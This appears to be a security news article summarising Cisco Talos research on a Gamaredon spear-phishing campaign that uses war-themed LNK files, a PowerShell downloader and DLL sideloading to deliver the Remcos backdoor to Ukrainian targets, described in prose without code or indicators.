Cisco Talos has uncovered an ongoing cyber campaign by the Gamaredon threat actor group, targeting Ukrainian users with malicious LNK files to deliver the Remcos backdoor.
Active since at least November 2024, this campaign employs spear-phishing tactics, leveraging themes related to the Ukraine conflict to lure victims into executing the malicious files.
The LNK files, disguised as Office documents, are distributed within ZIP archives and carry filenames referencing troop movements and other war-related topics in Russian or Ukrainian.
The attack begins with the execution of a PowerShell downloader embedded in the LNK file.
This downloader contacts geo-fenced servers located in Russia and Germany to retrieve a second-stage ZIP payload containing the Remcos backdoor.
The downloaded payload employs DLL sideloading techniques to execute the backdoor, a method that involves loading malicious DLLs through legitimate applications. This approach enables attackers to bypass traditional detection mechanisms.
Sophisticated Delivery Mechanisms
Gamaredon’s phishing emails likely include either direct attachments of the ZIP files or URLs redirecting victims to download them.
The campaign’s filenames, such as “Coordinates of enemy takeoffs for 8 days” or “Positions of the enemy west and southwest,” suggest a deliberate attempt to exploit sensitive geopolitical themes.
Metadata analysis indicates that only two machines were used to create these malicious shortcut files, consistent with Gamaredon’s operational patterns observed in previous campaigns.
The PowerShell scripts embedded in the LNK files use obfuscation techniques, such as leveraging the Get-Command cmdlet, to evade antivirus detection. Once executed, these scripts download and extract the ZIP payload into the %TEMP% folder.
The payload includes clean binaries that load malicious DLLs, which decrypt and execute the final Remcos backdoor payload.
This backdoor is injected into Explorer.exe and communicates with command-and-control (C2) servers hosted on infrastructure primarily based in Germany and Russia.
Targeted Infrastructure and Indicators of Compromise
The campaign’s C2 servers are hosted by Internet Service Providers such as GTHost and HyperHosting.
Notably, Gamaredon restricts access to these servers based on geographic location, limiting them to Ukrainian victims.
Reverse DNS records for some of these servers reveal unique artifacts that have helped researchers identify additional IP addresses associated with this operation.
The Remcos backdoor itself provides attackers with robust capabilities for remote control, including data exfiltration and system manipulation.
Cisco Talos has observed evidence of clean applications like TivoDiag.exe being abused for DLL sideloading during this campaign.
Gamaredon’s use of advanced techniques such as DLL sideloading, geo-fenced infrastructure, and thematic phishing underscores its persistence in targeting Ukraine amidst ongoing geopolitical tensions.
Organizations are advised to remain vigilant against such threats by implementing robust endpoint protection, email security measures, and network monitoring solutions.
IOCs for this threat can be found in our GitHub repository here.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
